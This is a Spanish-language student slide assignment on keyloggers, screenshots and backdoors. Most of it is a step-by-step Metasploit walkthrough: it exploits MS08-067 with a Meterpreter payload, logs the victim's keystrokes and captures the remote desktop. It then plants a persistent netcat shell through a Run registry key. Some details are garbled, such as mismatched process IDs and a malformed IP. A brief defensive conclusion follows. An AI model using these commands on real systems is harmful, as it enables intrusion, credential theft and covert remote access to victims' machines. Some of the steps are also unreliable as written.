ataque informatico (keylogger,screenshot,bavkdoor)

16
Nombre: Angélica Tomala Torres. Curso: S7k Docente: Carlos Montes. Materia: seguridad Informática. Screenshot Una captura de pantalla (también llamada pantallazo, o Screenshot en inglés) es una imagen tomada por una computadora para registrar los elementos visibles en el monitor u otro dispositivo de salida visual. Generalmente es una imagen digital tomada por el sistema operativo o aplicaciones siendo ejecutadas en la computadora, pero puede ser también una captura hecha por un dispositivo externo como una cámara o algún otro dispositivo interceptando la salida de video de la computadora. Keylogger Un Keylogger (derivado del bronx: key (tecla) y logger (registrador); registrador de teclas) es un tipo de software que se encarga de registrar las pulsaciones que se realizan en el teclado, para memorizarlas en un fichero y/o enviarlas a través de internet.

Upload: municipio-de-guayaquil

Post on 22-Dec-2014

1.477 views

Category:

Education


1 download

DESCRIPTION

TEMA: Ataque InformaticoKeylogger,screenshot,bavkdoorDocente: Carlos MontesAlumna:Angelica Tomala Torres

TRANSCRIPT

Page 1: Ataque Informatico (Keylogger,screenshot,bavkdoor)

Nombre: Angélica Tomala Torres.

Curso: S7k

Docente: Carlos Montes.

Materia: seguridad Informática.

ScreenshotUna captura de pantalla (también llamada pantallazo, o Screenshot en inglés) es una imagen tomada por una computadora para registrar los elementos visibles en el monitor u otro dispositivo de salida visual. Generalmente es una imagen digital tomada por el sistema operativo o aplicaciones siendo ejecutadas en la computadora, pero puede ser también una captura hecha por un dispositivo externo como una cámara o algún otro dispositivo interceptando la salida de video de la computadora.

KeyloggerUn Keylogger (derivado del bronx: key (tecla) y logger (registrador); registrador de teclas) es un tipo de software que se encarga de registrar las pulsaciones que se realizan en el teclado, para memorizarlas en un fichero y/o enviarlas a través de internet.

Suele usarse como malware del tipo daemon, permitiendo que otros usuarios tengan acceso a contraseñas importantes, como los números de una tarjeta de crédito, u otro tipo de información privada que se quiera obtener.

El registro de lo que se teclea puede hacerse tanto con medios de hardware como de software. Los sistemas comerciales disponibles incluyen dispositivos que pueden conectarse al cable del teclado (lo que

Page 2: Ataque Informatico (Keylogger,screenshot,bavkdoor)

los hace inmediatamente disponibles pero visibles si un usuario revisa el teclado) y al teclado mismo (que no se ven pero que se necesita algún conocimiento de como soldarlos para instalarlos en el teclado). Escribir aplicaciones para realizar keylogging es trivial y, como cualquier programa computacional, puede ser distribuido a través de un troyano o como parte de un virus informático o gusano informático. Se dice que se puede utilizar un teclado virtual para evitar esto, ya que sólo requiere clics del ratón. Sin embargo, las aplicaciones más nuevas también registran Screenshot (capturas de pantalla) al realizarse un click, que anulan la seguridad de esta medida.

Funcionamiento

El registro de las pulsaciones del teclado se puede alcanzar por medio de hardware y de software:

Keylogger con software

Enganchados: Estos Keylogger registran las pulsaciones de las teclas del teclado con las funciones proporcionadas por el sistema operativo. El sistema operativo activa el Keylogger en cualquier momento en que se presione una tecla, y realiza el registro.

En algunas computadoras podemos darnos cuenta si están infectadas por un keylogger (dependiendo de la velocidad y uso de CPU de nuestro procesador) por el hecho de que el programa registrara cada una de nuestras teclas de la siguiente manera: FicheroLog = FicheroLog + UltimaTecla, este evento será ejecutado por el keylogger cada vez que el usuario presione una tecla. Si bien este evento no será una carga relevante para nuestro procesador si se ejecuta a una velocidad normal, pero si mantienes unas 10 teclas presionadas por unos 30 segundos con la palma de tu mano y tu sistema se congela o su funcionamiento es demasiado lento podríamos sospechar que un Keylogger se ejecuta sobre nuestro computador. Otro signo de que un Keylogger se está ejecutando en nuestro computador es el problema de la tilde doble (´´) al presionar la tecla para acentuar vocales,

Page 3: Ataque Informatico (Keylogger,screenshot,bavkdoor)

salen dos tildes seguidas y la vocal sin acentuar. Esto ocurre en keyloggers configurados para otros idiomas. El problema desaparece al eliminarlo.

Comandos y terminos básicos

payload ----> Tipo de accion la cual se va a realizar si es explotada la vulnerabilidadaexploits ----> Programa para explotar la vulnerabilidadencoders ----> Algoritmos de ayudaauxiliary ---> Modulos o tools de msfset -----> Definir valoruse -----> Definir exploitrun -----> modo de ejecutar los auxiliaryssessions ---> mostrar / iniciar sessiones obtenidas con el metasploit

Meterpreter: es un payload avanzado que se incluye en el Metasploit Framework. Su objetivo es proporcionar a los complejos y las características avanzadas que de otro modo sería tedioso para aplicar estrictamente en el montaje. La forma en que se lleva a cabo esto es permitiendo a los desarrolladores escribir sus propias extensiones en forma de objeto compartido (DLL) que pueden cargar y se inyecta en un proceso que se ejecuta en un equipo de destino después de la explotación se ha producido.

Introduccion a metasploit

En el Shell escribimos

1. /pentest/exploits/framework32. ./msfconsole

Page 4: Ataque Informatico (Keylogger,screenshot,bavkdoor)

Este es el entorno visual del program. ahora, vamos a llamar al exploit que utilizaremos:

use exploit/windows/smb/ms08_067_netapi

luego especificamos la IP del ordenador a atacar y del que va atacar:

set RHOST direccionIP

set LHOST direccionIP

ejemplo: set RHOST 192.138.60.1

seleccionamos el payload:

set PAYLOAD windows/meterpreter/reverse_tcp

ahora ejecutamos el exploit:

exploit

Al poco tiempo veremos si nos hemos conectado satisfactoriamente a la victima:

Page 5: Ataque Informatico (Keylogger,screenshot,bavkdoor)

Ahora podemos iniciar el keylogger; pero antes miraremos los procesos que se estan ejecutando en el ordenador victima; ejecutamos:

ps

y nos saldra esto por ejemplo:

CitarProcess list============

PID Name Path--- ---- ----368 smss.exe SystemRootSystem32smss.exe548 csrss.exe ??C:WINDOWSsystem32csrss.exe576 winlogon.exe ??C:WINDOWSsystem32winlogon.exe656 services.exe C:WINDOWSsystem32services.exe668 lsass.exe C:WINDOWSsystem32lsass.exe824 svchost.exe C:WINDOWSsystem32svchost.exe840 cmd.exe C:WINDOWSsystem32cmd.exe892 svchost.exe C:WINDOWSsystem32svchost.exe988 svchost.exe C:WINDOWSSystem32svchost.exe1040 svchost.exe C:WINDOWSsystem32svchost.exe1128 svchost.exe C:WINDOWSsystem32svchost.exe1384 wuauclt.exe C:WINDOWSsystem32wuauclt.exe1512 spoolsv.exe C:WINDOWSsystem32spoolsv.exe1632 Explorer.EXE C:WINDOWSExplorer.EXE1684 alg.exe C:WINDOWSSystem32alg.exe1700 wscntfy.exe C:WINDOWSsystem32wscntfy.exe1800 ctfmon.exe C:WINDOWSsystem32ctfmon.exe1908 inetinfo.exe C:WINDOWSsystem32inetsrvinetinfo.exe1936 metsvc.exe C:WINDOWSTEMPLsMhsBTbmetsvc.exe

meterpreter >

Observamos que el proceso Explorer.exe tiene un PID (Process ID) de 1632, entonces mudaremos nuestra herramienta a ese proceso:

Page 6: Ataque Informatico (Keylogger,screenshot,bavkdoor)

migrate 316

Activamos el keylogger:

keyscan_start

Page 7: Ataque Informatico (Keylogger,screenshot,bavkdoor)

Ahora procedemos a cambiar de texto parar ver si en verdad esta registrando lo que nosotros tecleamos en el notepad.

y queremos ver lo que esta escribiendo la victima:

keyscan_dump

Page 8: Ataque Informatico (Keylogger,screenshot,bavkdoor)

si queremos una captura de pantalla escribiremos lo siguiente;

use espia

con el comando “use espia” cargamos el modulo y luego utilizando el comando screenshot seguido del nombre que le queramos capturaremos una imagen del escritorio remoto

luego usamos:

screenshot [Ruta_Archivo_Salida]

ejemplo: screenshot /imagen.bmp

si todo a salido bien obtendremos una imagen del escritorio “la imagen queda guardada en la ruta que nos muestra meterpreter como lo vemos en la imagen”

Page 9: Ataque Informatico (Keylogger,screenshot,bavkdoor)

BackDoor

1.- verifiquemos que no exista en el pc remoto ninguna clave dentro de registro de Windows además de verificar que no exista el archivo llamado nc.exe “Netcat”.

3. Verifiquemos que realmente se elimino.

Page 10: Ataque Informatico (Keylogger,screenshot,bavkdoor)

4. Ahora vamos a ver en el registro de Windows

Como vemos no existe ninguna entrada dentro de la clave \\currentversion\\run

5. En el Shell escribimos1. /pentest/exploits/framework32. ./msfconsole3. Este es el entorno visual del program. ahora, vamos a llamar al exploit que

utilizaremos:use exploit/windows/smb/ms08_067_netapi.

4. Show option

Page 11: Ataque Informatico (Keylogger,screenshot,bavkdoor)

6.-veriquemos cual es la ip de la victima

7.- set RHOST 192.168.0.3

8.- set payload Windows/meterprete/bind_tcp

9.- show options

Page 12: Ataque Informatico (Keylogger,screenshot,bavkdoor)

10.- exploit

11.- upload c:\\windows\\system32\\nc.exe c:\\windows\\system32\\

12.- reg setval –k HKLM\\software\\Microsoft\\windows\\Currentversion\\Run –d ¨C:\windows\System32\nc.exe –l –d –p 1234 cmd.exe

13.- vamos a reiniciar windows osea la victim con reboot

14.- exit

Page 13: Ataque Informatico (Keylogger,screenshot,bavkdoor)

15.- escribimos back16.- connect 192.168.0.3.1234

Page 14: Ataque Informatico (Keylogger,screenshot,bavkdoor)

17._ ipconfig

En conclusión:

Los keyloggers no representan una amenaza para el sistema mismo. Sin embargo, pueden significar una seria amenaza para los usuarios ya que pueden usarse para interceptar contraseñas y otro tipo de información confidencial ingresada a través del teclado. Como resultado, los ciberdelincuentes pueden obtener códigos PIN y números de cuentas de sistemas de pagos en línea, contraseñas para cuentas de usuarios de juegos en línea, direcciones de correo electrónico, nombres de usuario, contraseñas de correo electrónico, etcétera.

Por eso siempre debemos de estar pendiente de los ataques ya sea Keylogger, Screenshot, backdoor o otros etc. Porque por medio de esto nos pueden estar vigilando lo que estamos haciendo e incluso por medio de Keylogger nos están capturando lo que nosotros tecleamos y con el Screenshot nos captura lo que estamos haciendo.

Por eso para que esto no nos afecte lo que tenemos que hacerle a nuestro Windows es hacerlo indestructible para que nadie nos pueda atacar con ningún tipo de ataque y tomar medida preventiva como por ejemplo:

Usar un antivirus estándar que pueda ser adaptado para la detección de programas potencialmente maliciosos (opción preconfigurada en muchos productos), la protección proactiva protegerá el sistema contra nuevas modificaciones de keyloggers existentes.

Uso de un teclado virtual o de un sistema para generar contraseñas de uso único para protegerse contra programas y dispositivos keylogger.